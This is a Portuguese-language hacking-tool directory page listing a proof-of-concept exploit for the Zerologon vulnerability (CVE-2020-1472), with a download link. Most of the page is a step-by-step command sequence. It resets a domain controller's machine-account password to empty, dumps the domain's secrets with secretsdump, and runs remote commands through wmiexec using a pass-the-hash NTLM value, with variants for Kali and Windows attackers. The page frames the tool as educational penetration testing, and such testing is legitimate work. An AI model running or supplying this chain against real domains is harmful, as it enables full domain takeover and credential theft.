Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ZerologonWithImpacket-CVE2020-1472 — Uma prova de conceito prática para CVE-2020-1472 (Zerologon) usando a biblioteca Impacket para explorar a vulnerabilidade Netlogon e realizar acesso não autorizado ao controlador de domínio. | Kitploit
Ferramentas/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
Escalada de PrivilégiosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoMovimento LateralPós-ExploraçãoTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

Uma prova de conceito prática para CVE-2020-1472 (Zerologon) usando a biblioteca Impacket para explorar a vulnerabilidade Netlogon e realizar acesso não autorizado ao controlador de domínio.

Ver Repositório
13há 1 anoAinda não revisado

Exploit de Combinação Zerologon e Impacket (CVE-2020-1472)

Este repositório contém uma implementação atualizada (2024) do exploit Zerologon combinado com ferramentas Impacket para explorar CVE-2020-1472 (Zerologon). Este exploit tem como alvo ambientes Windows Server para manipular senhas de contas de máquina e realizar movimentação lateral.

Características

  • Explora CVE-2020-1472 (Zerologon) para definir a senha da conta de máquina do alvo como uma string vazia.
  • Utiliza ferramentas Impacket para extrair credenciais e executar comandos na máquina vítima.

Requisitos

  1. Python 3.x
  2. Instale as dependências necessárias executando:
    root@kitploit:~
    pip install -r requirements.txt
    

Uso

Exemplo de Cenário

  • Vítima: Windows Server 2016
  • Atacante: Kali Linux (ou sistema Windows)

Comandos do Exploit (Kali Linux)

  1. Defina a senha da conta de máquina como uma string vazia:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Extraia segredos do Controlador de Domínio:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. Execute comandos na máquina vítima:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Comandos do Exploit (Atacante Windows)

  1. Defina a senha da conta de máquina como uma string vazia:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Extraia segredos do Controlador de Domínio:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. Execute comandos na máquina vítima:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Notas

  • Substitua WIN-C9PAHHGJN91 e 192.168.40.145 pelo nome do host e endereço IP reais do alvo.
  • Certifique-se de ter a devida autorização antes de usar esta ferramenta.
  • Esta ferramenta é apenas para fins educacionais e de teste de penetração.

Aviso Legal

Use esta ferramenta com responsabilidade. O uso não autorizado desta ferramenta para explorar sistemas sem permissão explícita é ilegal e antiético. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.

Baixar ferramenta